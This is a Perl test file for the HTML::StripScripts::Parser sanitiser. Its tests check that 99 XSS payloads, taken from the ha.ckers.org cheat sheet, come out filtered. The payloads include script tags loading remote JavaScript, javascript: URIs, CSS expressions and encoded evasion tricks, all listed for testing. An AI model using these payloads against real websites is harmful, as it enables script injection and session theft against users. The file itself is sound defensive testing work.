use strict;
use Test::More tests => 100;
BEGIN { $^W = 1 }
use HTML::StripScripts::Parser;
my @tests;
my $p =
HTML::StripScripts::Parser->new( { AllowHref => 1,
AllowRelURL => 1,
AllowMailto => 1,
strict_names => 1,
strict_comments => 1,
}
);
isa_ok( $p, "HTML::StripScripts::Parser" );
my $i = 0;
while (@tests) {
$i++;
my $in = shift @tests;
my $out = shift @tests;
my $result = $p->filter_html($in);
is( $result, $out, "xss $i" );
}
# These XSS tests are from http://ha.ckers.org/xss.html
# I have excluded the google.com URL tests, as all of them are valid URLs (I think)
BEGIN {
@tests = (
# 1
q{';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&\{\}},
q{';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><!--filtered-->">'><!--filtered--><!--filtered-->=&{}},
# 2
q{'';!--"<XSS>=&\{()\}},
q{'';!--"<!--filtered-->=&{()}},
# 3
q{<SCRIPT>alert('XSS')</SCRIPT>},
q{<!--filtered--><!--filtered-->},
# 4
q{<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>},
q{<!--filtered--><!--filtered-->},
# 5
q{<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>},
q{<!--filtered--><!--filtered-->},
# 6
q{<BASE HREF="javascript:alert('XSS');//">},
q{<!--filtered-->},
# 7
q{<BGSOUND SRC="javascript:alert('XSS');">},
q{<!--filtered-->},
# 8
q{<BODY BACKGROUND="javascript:alert('XSS');">},
q{<!--filtered-->},
# 9
q{<BODY ONLOAD=alert('XSS')>},
q{<!--filtered-->},
# 10
q{<DIV STYLE="background-image: url(javascript:alert('XSS'))">},
q{<div style=""></div>},
# 11
q{<DIV STYLE="background-image: url(javascript:alert('XSS'))">},
q{<div style=""></div>},
# 12
q{<DIV STYLE="width: expression(alert('XSS'));">},
q{<div style=""></div>},
# 13
q{<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>},
q{<!--filtered--><!--filtered--><!--filtered-->},
# 14
q{<IFRAME SRC="javascript:alert('XSS');"></IFRAME>},
q{<!--filtered--><!--filtered-->},
# 15
q{<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">},
q{<!--filtered-->},
# 16
q{<IMG SRC="javascript:alert('XSS');">},
q{<img />},
# 17
q{<IMG SRC=javascript:alert('XSS')>},
q{<img />},
# 18
q{<IMG DYNSRC="javascript:alert('XSS');">},
q{<img />},
# 19
q{<IMG LOWSRC="javascript:alert('XSS');">},
q{<img />},
# 20
q{exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE>li \{list-style-image: url("javascript:alert('XSS')");\}</STYLE><UL><LI>XSS},
q{exp/*<!--filtered--><!--filtered--><!--filtered-->},
# 21
q{<IMG SRC='vbscript:msgbox("XSS")'>},
q{<img />},
# 22
q{<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>},
q{<!--filtered--><!--filtered-->},
# 23
q{<IMG SRC="livescript:[code]">},
q{<img />},
# 24
q{<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">},
q{<!--filtered-->},
# 25
q{<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">},
q{<!--filtered-->},
# 26
q{<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">},
q{<!--filtered-->},
# 27
q{<IMG SRC="mocha:[code]">},
q{<img />},
# 28
q{<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>},
q{<!--filtered--><!--filtered-->},
# 29
q{<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>},
q{<!--filtered--><!--filtered--><!--filtered-->},
# 30
q{<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>},
q{<!--filtered--><!--filtered-->},
# 31
q{a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")";},
q{a="get";
b="URL("";
c="javascript:";
d="alert('XSS');")";},
# 32
q{<STYLE TYPE="text/javascript">alert('XSS');</STYLE>},
q{<!--filtered--><!--filtered-->},
# 33
q{<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">},
q{<img />},
# 34
q{<XSS STYLE="xss:expression(alert('XSS'))">},
q{<!--filtered-->},
# 35
q{<STYLE>.XSS\{background-image:url("javascript:alert('XSS')");\}</STYLE><A CLASS=XSS></A>},
q{<!--filtered--><!--filtered--><a></a>},
# 36
q{<STYLE type="text/css">BODY\{background:url("javascript:alert('XSS')")\}</STYLE>},
q{<!--filtered--><!--filtered-->},
# 37
q{<LINK REL="stylesheet" HREF="javascript:alert('XSS');">},
q{<!--filtered-->},
# 38
q{<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">},
q{<!--filtered-->},
# 39
q{<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>},
q{<!--filtered--><!--filtered-->},
# 40
q{<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">},
q{<!--filtered-->},
# 41
q{<STYLE>BODY\{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")\}</STYLE>},
q{<!--filtered--><!--filtered-->},
# 42
q{<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>},
q{<table></table>},
# 43
q{<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>},
q{<table><!--filtered--><!--filtered--></table>},
# 44
q{<HTML xmlns:xss>},
q{<!--filtered-->},
# 45
q{<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>},
q{<!--filtered--><!--filtered--><!--filtered--><!--filtered--><!--filtered-->]]>},
# 46
q{<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>},
q{<!--filtered--><i><b><img /></b></i><!--filtered-->},
# 47
q{<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>},
q{<!--filtered--><!--filtered-->},
# 48
q{<HTML><BODY>},
q{<!--filtered--><!--filtered-->},
# 49
q{<!--[if gte IE 4]>},
q{<!--filtered-->},
# 50
q{<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">},
q{<!--filtered-->},
# 51
q{<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">},
q{<!--filtered-->},
# 52
q{<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>},
q{<!--filtered--><!--filtered-->},
# 53
q{<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->},
q{<!--filtered--><!--filtered--><!--filtered-->'"-->},
# 54
q{<? echo('<SCR)';},
q{<!--filtered-->},
# 55
q{<BR SIZE="&\{alert('XSS')\}">},
q{<br />},
# 56
q{<},
q{<!--filtered-->},
# 57
q{<IMG SRC=JaVaScRiPt:alert('XSS')>},
q{<img />},
# 58
q{<IMG SRC=javascript:alert("XSS")>},
q{<img />},
# 59
q{<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>},
q{<img />},
# 60
q{<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>},
q{<img />},
# 61
q{<IMG SRC=javascript:alert('XSS')>},
q{<img />},
# 62
q{<IMG SRC=javascript:alert('XSS')>},
q{<img />},
# 63
q{<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">},
q{<div style=""></div>},
# 64
q{<IMG SRC=javascript:alert('XSS')>},
q{<img />},
# 65
q{<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-},
q{<!--filtered--><!--filtered--> <!--filtered-->+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-},
# 66
q{\";alert('XSS');//},
q{\";alert('XSS');//},
# 67
q{</TITLE><SCRIPT>alert("XSS");</SCRIPT>},
q{<!--filtered--><!--filtered--><!--filtered-->},
# 68
q{<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>},
q{<!--filtered--><!--filtered-->},
# 69
q{<IMG SRC="jav ascript:alert('XSS');">},
q{<img />},
# 70
q{<IMG SRC="jav	ascript:alert('XSS');">},
q{<img />},
# 71
q{<IMG SRC="jav
ascript:alert('XSS');">},
q{<img />},
# 72
q{<IMG SRC="jav
ascript:alert('XSS');">},
q{<img />},
# 73
q{<IMG},
q{<!--filtered-->},
# 74
q{perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out},
q{perl -e 'print "<img />";'> out},
# 75
q{perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out},
q{perl -e 'print "&<!--filtered-->alert("XSS")<!--filtered-->";' > out},
# 76
q{<IMG SRC="  javascript:alert('XSS');">},
q{<img />},
# 77
q{<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>},
q{<!--filtered--><!--filtered-->},
# 78
q{<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>},
q{<!--filtered-->},
# 79
q{<SCRIPT SRC=http://ha.ckers.org/xss.js},
q{<!--filtered-->},
# 80
q{<SCRIPT SRC=//ha.ckers.org/.j>},
q{<!--filtered-->},
# 81
q{<IMG SRC="javascript:alert('XSS')"},
q{<!--filtered-->},
# 82
q{<IFRAME SRC=http://ha.ckers.org/scriptlet.html <},
q{<!--filtered-->},
# 83
q{<<SCRIPT>alert("XSS");//<</SCRIPT>},
q{<<!--filtered--><!--filtered-->},
# 84
q{<IMG """><SCRIPT>alert("XSS")</SCRIPT>">},
q{<img /><!--filtered--><!--filtered-->">},
# 85
q{<SCRIPT>a=/XSS/},
q{<!--filtered--><!--filtered-->},
# 86
q{<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>},
q{<!--filtered--><!--filtered-->},
# 87
q{<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>},
q{<!--filtered--><!--filtered-->},
# 88
q{<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>},
q{<!--filtered--><!--filtered-->},
# 89
q{<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>},
q{<!--filtered--><!--filtered-->},
# 90
q{<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>},
q{<!--filtered--><!--filtered-->},
# 91
q{<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>},
q{<!--filtered--><!--filtered-->PT SRC="http://ha.ckers.org/xss.js"><!--filtered-->},
# 92
q{<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>},
q{<!--filtered--><!--filtered-->},
# 93
q{<A HREF="h},
q{<!--filtered-->},
# 94
q{<A HREF="http://ha.ckers.org@google">XSS</A>},
q{<a>XSS</a>},
# 95
q{<A HREF="http://google:ha.ckers.org">XSS</A>},
q{<a>XSS</a>},
# 96
q{<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>},
q{<a>XSS</a>},
# 97
q{<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>},
q{<a>XSS</a>},
# 98
q{<img alt="test test" />},
q{<img alt="test test" />},
# 99
q{<img alt=test test />},
q{<img alt="test&#10;test" />},
);
}